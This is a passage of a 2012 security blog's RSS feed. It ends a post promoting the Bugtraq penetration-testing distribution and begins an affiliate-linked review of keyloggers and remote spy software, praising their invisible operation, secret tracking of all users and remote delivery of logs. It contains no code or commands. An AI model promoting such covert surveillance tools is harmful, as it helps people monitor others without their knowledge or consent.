&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;We are the distribution and  Forensic Pentesting with more tools built and&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;functional, well organized menu  without repetition of the same to avoid&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;overwhelming the user.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;h3 align="CENTER" class="western" style="font-family: inherit;"&gt;&lt;span style="color: blue; font-size: small;"&gt;&lt;u&gt;&lt;b&gt;WIRELESS AND BLUETOOH SUPPORTED PATCHES&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="color: red; font-size: small;"&gt;&lt;u&gt;&lt;b&gt;Wireless chipsets:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;adm8211&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ath5k&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ath9h&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ar9170&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;b43&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;b43legacy&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;iwl3945&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;iwlagn&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ipw2100&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ipw2200&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;libertas_cs (Libertas)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ub8xxx (Libertas)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;p54pci&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;p54usb&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rt2400pci (rt2x00)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rt2500pci (rt2x00)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rt2500usb (rt2x00)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rt61pci (rt2x00)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rt73usb (rt2x00)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rtl8180 (Realtek)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rtl8187 (Realtek)&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;zd1211rw&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="color: red; font-size: small;"&gt;&lt;u&gt;&lt;b&gt;Bluetooth drivers:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;bluetooth&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;btusb&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;hci_uart&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;btsdio&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;btuart_cs&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;bluecard_cs&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;bfusb&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Kindly click on an image to see the full and the clear view&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://4.bp.blogspot.com/-U3nQvGxoy0k/T2CufBh8fuI/AAAAAAAABD0/ipgaVbDxpY4/s1600/exploits.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="356" src="http://4.bp.blogspot.com/-U3nQvGxoy0k/T2CufBh8fuI/AAAAAAAABD0/ipgaVbDxpY4/s640/exploits.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://3.bp.blogspot.com/-QVpLt2aFZOE/T2Cu1qTsRCI/AAAAAAAABD8/2Yh0iDvZjJ0/s1600/phreaking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-QVpLt2aFZOE/T2Cu1qTsRCI/AAAAAAAABD8/2Yh0iDvZjJ0/s640/phreaking.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://3.bp.blogspot.com/-HwtVLOoN4r0/T2CvUNLPrZI/AAAAAAAABEE/huPPidlWZr8/s1600/voip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-HwtVLOoN4r0/T2CvUNLPrZI/AAAAAAAABEE/huPPidlWZr8/s640/voip.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://3.bp.blogspot.com/-Pfd5tOsK524/T2CvywVjWrI/AAAAAAAABEM/qpFRF4QOvF0/s1600/webshells.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-Pfd5tOsK524/T2CvywVjWrI/AAAAAAAABEM/qpFRF4QOvF0/s640/webshells.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;For download it and more additional information, visit :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.bugtraq-team.com/" target="_blank"&gt;&lt;b&gt;http://www.bugtraq-team.com&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Languages available in Spanish and English&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;span class="st_twitter_large" displaytext="Tweet" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email" style="font-size: small;"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis" style="font-size: small;"&gt;&lt;/span&gt;   &lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-380036751440561721?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=65Uusu-PNUc:2_u5EbQZUYQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=65Uusu-PNUc:2_u5EbQZUYQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=65Uusu-PNUc:2_u5EbQZUYQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=65Uusu-PNUc:2_u5EbQZUYQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=65Uusu-PNUc:2_u5EbQZUYQ:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/65Uusu-PNUc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/65Uusu-PNUc/bugtraq-i-distribution-for-pentesting.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-FiNPsP4v7PQ/T2Ct3fqBPVI/AAAAAAAABDs/fT9y-5bO3bU/s72-c/bugtraq_azul.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/bugtraq-i-distribution-for-pentesting.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1606278231825757136</guid><pubDate>Mon, 12 Mar 2012 19:07:00 +0000</pubDate><atom:updated>2012-03-12T12:08:06.381-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>Spy Softwares Keyloggers &amp; RAT Review</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/TyO78IfU9ck01U5CDnce7TJ1dKk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TyO78IfU9ck01U5CDnce7TJ1dKk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/TyO78IfU9ck01U5CDnce7TJ1dKk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TyO78IfU9ck01U5CDnce7TJ1dKk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/03/spy-softwares-keyloggers-rat-review.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-hY9QSxVB1bE/T15IjDPBylI/AAAAAAAABDk/Ahmz5PNPXAA/s200/keylogger.png" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Spy software's (Keylogger, RAT) are the programs that has an ability to monitor a computer and to make log files for every activities, some keylogger works remotely and they can send the log files via email or FTP. There are so many keyloggers are available on the Internet and the usage of keyloggers depends on the need and requirement. Since we does not encourage the wrong usage of technology and in this article we will review some best keyloggers but the aim is not to hack someone via keylogger but the aim is to monitor the child's and employee.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;There are so many peoples has requested me to make an article on keylogger that is why I have decided to review some keyloggers. &lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;h3 align="CENTER" class="western" style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=1682768&amp;amp;referrer=887890"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/a&gt;&lt;/h3&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=1682768&amp;amp;referrer=887890" target="_blank"&gt;AllIn One Keylogger&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;This is Invisible Keylogger surveillance software , Keystrokes Recorder, Spy Software tool that registers every activity on your PC to encrypted logs. The Keylogger Software allows you to secretly track all activities from all computer users and automatically receive logs to a desire e-mail/FTP/LAN accounting.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Some interesting feature:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;ul style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=1682768&amp;amp;referrer=887890" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-JJshr0Ig1vk/T15Gnmf1UKI/AAAAAAAABDM/mFhTtWuNfLo/s200/boxSmall.jpg" width="200" /&gt;&lt;/a&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Keystrokes Logging (Key  Logging) &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Chat / Instant Message  Recording (Chat Logger/IM Logger) &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Web Recording (Web  Logger/Internet Logger &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Screenshot Logging (Spy  Camera) &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Microphone Logging &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Log files Encryption &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Anti-Spy Protection &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Email Delivery &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;FTP Delivery &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Block/filter Unwanted URLs &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Disable Unwanted Software's &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Auto Uninstall&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;&lt;h3 align="CENTER" class="western" style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=1682768&amp;amp;referrer=887890" target="_blank"&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 align="CENTER" class="western" style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=3092906&amp;amp;referrer=887890"&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
  H3.western { font-family: "Arial", sans-serif }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;   &lt;/a&gt;&lt;/h3&gt;&lt;h3 align="CENTER" class="western"&gt;&lt;span style="color: blue;"&gt;&lt;u&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=3092906&amp;amp;referrer=887890" target="_blank"&gt;SniperSpy Remote Spy Software&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div align="LEFT" style="font-family: inherit; text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;SniperSpy allows you to remotely watch your computer like a television! Watch what happens on the screen LIVE! The only remote monitoring software with a SECURE control panel! &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;The software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Some features:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;ul style="font-family: inherit;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=3092906&amp;amp;referrer=887890" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-55wUAJkmET8/T15Gy76Z82I/AAAAAAAABDU/iknXFVDoeJ4/s200/box6b.gif" width="181" /&gt;&lt;/a&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Keystrokes  in Most Languages &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Full  Chat Conversations &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Application  Session Durations  &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Real  Time Screen Viewer &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Real  Time Keystroke Viewer &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="text-decoration: none;"&gt;&lt;b&gt;&lt;span style="color: black; font-size: small;"&gt;Reboot  / Shutdown / Logoff &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;
